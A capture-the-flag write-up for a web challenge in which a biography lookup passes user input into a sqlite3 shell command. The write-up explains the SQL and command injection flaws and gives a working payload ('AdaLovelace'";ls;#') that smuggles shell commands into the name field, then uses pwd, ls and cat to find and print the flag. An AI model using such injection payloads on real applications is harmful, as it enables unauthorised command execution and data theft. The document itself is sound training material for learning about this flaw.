Shafrira Goldwasser
Challenge Description
Challenge Attachment
so this application gives you options and for each one it brings the biography related to it from the database
SQL Injection
to find an attack vector we will look at the source code
so we have an sql injection since the user input is not parametrized and sanitized but even if we manage to pull the whole database we won't find the flag in it
Command Injection
we have another attack vector which is command injection since the sql command is executed within a subprocess so what we have to is try to find a way to inject other commands besides sqlite3 command
doing it directly without visualizing the query generated is going to be very hard so what we will be doing is running the app locally and print the query and the result to help us construct the payload
using burp repeater we will be manipulating the user input to find a working payload
so the payload we will generate is simple we will try to escape the first command which is
sqlite3 database.db "SELECT biography FROM cyberheroines WHERE name='userInput' "to do that we have to get out of the double quote add the injected command and then the remaining garbage should be commented
payload
AdaLovelace'";ls;#
now let's go back to the original web server and try to use this and find the flag
listing the current directory doesn't contain the flag file
let's check the current working directory using pwd command
let's see what are the files in the root / directory
let's read its content using cat command
Flag
chctf{CH4ng3d_h0w_w3_th1Nk_of_pr00f$}Last updated
Was this helpful?